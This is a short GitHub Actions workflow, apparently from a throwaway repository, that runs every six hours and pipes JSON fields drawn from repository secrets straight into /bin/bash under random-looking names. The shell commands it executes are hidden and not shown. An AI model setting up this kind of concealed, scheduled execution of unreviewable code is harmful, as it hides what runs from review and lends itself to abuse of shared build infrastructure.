name: jiangyigu1829
on:
  workflow_dispatch:
  schedule:
    - cron: '21 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiangyigu1829
        env:
          qt1: ${{ secrets.qt1 }}
        run: |
          echo $qt1 | jq -r .v696 | /bin/bash
          echo $l41 | jq -r .fezd407 | /bin/bash
          echo $rflw3 | jq -r .cra3 | /bin/bash
          echo $krqgr43602 | jq -r .ldyhr333 | /bin/bash
          echo $rd90 | jq -r .npz2 | /bin/bash
          echo $o8 | jq -r .cn92894 | /bin/bash
          echo $w92 | jq -r .cxs7 | /bin/bash
          echo $glqt28445 | jq -r .ofar3 | /bin/bash

